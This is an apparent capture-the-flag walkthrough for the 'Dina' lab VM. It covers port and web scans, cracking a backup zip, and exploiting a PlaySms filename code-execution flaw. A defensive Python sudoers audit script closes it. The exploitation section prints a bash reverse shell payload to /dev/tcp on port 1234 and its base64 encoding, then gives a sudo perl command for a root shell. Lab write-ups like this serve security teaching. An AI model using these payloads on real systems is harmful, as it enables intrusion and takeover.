The IP address of the target machine is found with the Netdiscover tool.
The IP of the machine is 192.168.1.165.
Initial Analysis
First, the Nmap scanner is used to find all open ports and the services running on them.
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- -T4 -A 192.168.1.165
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:47 EDT
Nmap scan report for 192.168.1.165
Host is up (0.0026s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds
The scan shows only one open port, 80, serving Apache httpd 2.2.22, and a robots.txt file that disallows five directories.
Navigating to the page hosted by the Apache server:
The page itself revealed no important information. Since a robots.txt file is present, the disallowed directories are checked next.
The page in the nothing directory contained no useful information either.
Checking the page source, however:
A list of passwords was revealed. These might be useful later.
It’s time to do some more recon.
The Nikto web scanner is used here to look for possible vulnerabilities and further information.
┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.1.165
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.165
+ Target Hostname:    192.168.1.165
+ Target Port:        80
+ Start Time:         2021-08-05 01:50:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 09:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8730 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2021-08-05 01:50:54 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
This scan revealed a directory named secure that was not mentioned in the robots.txt file.
Next, the Dirb web content scanner is used to look for further hidden directories.
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug  5 01:52:25 2021
URL_BASE: http://192.168.1.165/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.165/ ----
+ http://192.168.1.165/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.1.165/index (CODE:200|SIZE:3618)
+ http://192.168.1.165/index.html (CODE:200|SIZE:3618)
+ http://192.168.1.165/robots (CODE:200|SIZE:102)
+ http://192.168.1.165/robots.txt (CODE:200|SIZE:102)
==> DIRECTORY: http://192.168.1.165/secure/
+ http://192.168.1.165/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.1.165/tmp/
==> DIRECTORY: http://192.168.1.165/uploads/

---- Entering directory: http://192.168.1.165/secure/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.165/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.165/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Aug  5 01:52:29 2021
DOWNLOADED: 4612 - FOUND: 6
This scan also lists the secure directory that the Nikto scan had already found.
It might contain something useful, so it is checked next:
The directory contained a file named backup.zip, which asked for a password when extracted.
Trying the passwords found in the nothing directory, the password “freedom” worked. After extracting, an mp3 file was found. Since it might hold useful information, it was read with cat, which worked:
That file contained a username, a hidden password and a URL. Checking the URL:
The URL led to a web application named PlaySms, which asked for login credentials. Since the username “touhid” was mentioned in the backup-cred.mp3 file, that was worth trying. The only source for a password was the list found in the nothing directory; trying those one by one, the password “diana” worked here.
This says that when a file is uploaded through the application's sendfromfile option, PHP code placed in the filename gets executed. To check whether the exploit works, the filename given in the description is used, i.e. .php
And when uploaded:
Perfect! The script is getting executed. Now it is time to exploit this by placing a reverse shell payload where ‘uname -a’ sits in the filename.
The payload which is going to be used here is:
bash -i >& /dev/tcp/192.168.1.222/1234 0>&1
To execute this it has to go in the filename, but a filename can’t contain slashes. To get around that, the payload is base64-encoded before upload and decoded again on the server before it is executed.
The encoded payload: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo=
In place of uname -a inside the single quotes, the payload below is used to spawn a reverse TCP shell.
Before uploading the file, a netcat listener is started on port 1234, the port used in the payload. The file is then uploaded, which spawns the reverse shell.
Privilege Escalation
The sudo permissions are then checked with ‘sudo -l’:
This shows that perl can be run as root with sudo, so using it to exec a shell spawns a root shell.
So for spawning a bash shell with perl the command below is used:
sudo /usr/bin/perl -e 'exec "/bin/bash";'
Finally, a root shell is spawned and the flag is found in the /root directory.
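As an added defender's counterpart to the ‘sudo -l’ check above (not code from this walkthrough), the Python script below audits rules in /etc/sudoers syntax for interpreters, editors and pagers that can exec a shell when run as root, which is exactly what the perl rule on this box allowed. The shell-capable list, the sample sudoers content and the www-data account name are constructed assumptions.

```python
import re

# Binaries that give code execution or an interactive shell when sudo runs them
# as root (interpreters, editors, pagers). Constructed, non-exhaustive list;
# perl is the one this box exposed.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "php", "bash",
                 "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more",
                 "find", "awk", "env", "tar", "zip"}

# user_or_%group  host = (runas[:group])  [TAG:] cmd1, cmd2, ...
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                  r"(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@")

def audit_sudoers(text: str) -> list:
    """Return (who, command, reason) for rules in /etc/sudoers syntax that hand
    out root. Aliases and include directives are out of scope here."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m or m.group("who") == "root":        # root's own rule is expected
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            tag = TAG.match(cmd)
            while tag:                               # strip NOPASSWD: and friends
                cmd = cmd[tag.end():]
                tag = TAG.match(cmd)
            if cmd == "ALL":
                findings.append((m.group("who"), cmd, "any command as root"))
                continue
            binary = (cmd.split() or [""])[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                findings.append((m.group("who"), cmd, f"{binary} can exec a shell"))
    return findings

# Constructed sudoers content mirroring this box: a low-privileged account may
# run perl as root without a password (the account name is an assumption).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
"""
```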